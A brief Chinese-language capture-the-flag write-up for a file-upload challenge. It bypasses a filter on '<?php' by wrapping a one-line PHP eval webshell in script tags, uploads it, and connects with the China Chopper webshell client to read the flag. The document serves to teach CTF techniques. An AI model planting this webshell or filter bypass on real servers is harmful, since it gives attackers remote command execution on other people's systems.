Upload
这道题貌似是一道简单上传题,原本想的是使用一句话木马,不管了先随便写个简单的php上传上去,然后点击上传成功的链接进去看看,发现我们的代码被原封不动的打印出来了,多次尝试后发现<?php和php被过滤了。。。。
所以这里我们就不使用<?和php
修改代码为
<script language="PHP">
@eval($_POST["cmd"]);
</script>
就可以避开<?php的使用了,然后上传上传,点开上传成功就可以看到我们文件的所在了,这里我的是123.php所以url栏就是
然后我们使用中国菜刀创建新连接
然后双击进去就可以进入后台目录了
在htmll中找到flag
点开就可以看到flag了